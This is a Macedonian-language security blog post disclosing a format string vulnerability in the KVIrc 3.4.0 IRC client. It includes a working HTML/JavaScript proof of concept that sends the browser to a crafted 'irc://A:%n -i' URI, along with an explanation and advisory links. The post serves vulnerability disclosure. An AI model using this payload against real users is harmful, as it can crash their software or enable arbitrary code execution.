Почетна arrow Блог arrow Комп. сигурност arrow KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)
 
 
Компјутерска сигурност
Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи
RSS Канал  
Е-пошта  
Биографија  
 
 
Ѓоко Крстиќ
 
KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Испечати Е-пошта
Автор: Ѓоко Крстиќ   
Објавено на: 27.10.2008
Слабост кај IRC клиентот KVIrc (http://www.kvirc.net) од типот Format String со чија помош може да дојде до извршување на своеволен код или пак Denial of Service.

Image

Доказ на концептот:

------------------------------------------------------------------
<!--

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.

Product web page: http://www.kvirc.net/

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

24.10.2008

-->

<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
poc();
}

else
{
window.location.href = "http://www.kvirc.net";
}

</script> </body> </head> </html>

------------------------------------------------------------------

Слабоста се случува кога наменетата апликација преку интернет прелистувач со адреса: irc://A:%n -i ги изврши дадените аргументи. Аргументот -i се користи за подршка за IPv6, додека format string се случува во делот во доделување на порт односно: irc://IP:PORT [options].

Тест (со претпазливост): http://zeroscience.org/codes/kvirc_fs.html

Референти:
- http://www.frsirt.com/english/advisories/2008/2926
- http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html
- http://www.milw0rm.com/exploits/6832
- http://www.securityfocus.com/bid/31912
- http://secunia.com/advisories/32410/


Клучни зборови:  KVIrc   Format String   PoC   Експлоит   URI   URL

 
Сподели:
Кајмакот
Digg
Technorati
Stumble
Reddit
YahooMyWeb
Delicious
Ma.gnolia
Facebook
Spurl

Bluetooth?

Технологијата Bluetooth го добила своето име по норвешкиот крал Харалд Блутут (Harald Bluetooth), кој бил познат по тоа што ги обединувал завојуваните племиња во Данска и Норвешка. Целта на технологијата исто така е да ги обедини разните технологии.
Корисничко име

Лозинка



RSS канали на it.com.mk

Прашалник

Од каде се информирате?

(117 глас/а)

  • 22.2%
  • 19.7%
  • 35.9%
  • 13.7%
  • 8.5%

Низ it.com.mk Блог Сервиси Маркетинг
Вести
Статии
Форум
Рецензии
Совети & трикови
Преземања
Настани
Барометар
Едуцентар
Препорачуваме
Сите блогови
е-Бизнис 2.0
Од различен аспект
Uid=0
Хардверманија
Компјутерска сигурност
Apple
Линукс блог
Веб-Соц Свет
Членство
Е-билтен
RSS канали
PDA верзија

Профили
Facebook профилTwitter профилIT.com.mk @ Flickr
IT.com.mk @ YouTubeLinkedIn профилFriendFeed профил
Каква музика слушаат ИТ луѓето?Препорачуваме линкови преку Delicious Главен RSS канал
IWM NETWORK - iwmnetwork.com
ИТ Консалтинг, Интерактивен маркетинг, Истражувања и анализи, Веб дизајн...

IT.com.mk маркетинг